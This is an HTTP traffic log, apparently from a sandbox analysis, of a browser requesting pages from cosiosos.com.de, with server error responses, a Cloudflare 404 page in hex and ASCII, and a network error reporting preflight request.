2024-10-29 17:46:28 UTC	433	IN	HTTP/1.1 500 Internal Server Error Date: Tue, 29 Oct 2024 17:46:28 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8da4fc395c2b2cb4-DFW alt-svc: h3=":443"; ma=86400
2024-10-29 17:46:28 UTC	15	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 30 Data Ascii: error code: 500

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:28 UTC	638	OUT	GET /favicon.ico HTTP/1.1 Host: cosiosos.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cosiosos.com.de/7i2ko/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=64bes3fr1ldegf61evvb22jcl6
2024-10-29 17:46:29 UTC	841	IN	HTTP/1.1 404 Not Found Date: Tue, 29 Oct 2024 17:46:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, max-age=0 pragma: no-cache vary: Accept-Encoding CF-Cache-Status: BYPASS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=78PcKPPc%2BblG5PoT1jZcMGvy0TBphHg6dRAaBqMRmtpWSoW8b8ghN%2FZXDLM9HZRqdHN2eldibX4W6tTXEPjuHGieGOcBTyAtlal30hZjAgvDhV%2BQtpv8anVv0yCaeZ5ED1Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8da4fc3a9e704788-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1924&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1216&delivery_rate=1489711&cwnd=251&unsent_bytes=0&cid=de871257fc9193b9&ts=2352&x=0"
2024-10-29 17:46:29 UTC	528	IN	Data Raw: 34 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f Data Ascii: 4e1<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</
2024-10-29 17:46:29 UTC	728	IN	Data Raw: 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 Data Ascii: ; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div
2024-10-29 17:46:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-10-29 17:46:29 UTC	536	OUT	OPTIONS /report/v4?s=78PcKPPc%2BblG5PoT1jZcMGvy0TBphHg6dRAaBqMRmtpWSoW8b8ghN%2FZXDLM9HZRqdHN2eldibX4W6tTXEPjuHGieGOcBTyAtlal30hZjAgvDhV%2BQtpv8anVv0yCaeZ5ED1Y%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://cosiosos.com.de Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-29 17:46:29 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Tue, 29 Oct 2024 17:46:29 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close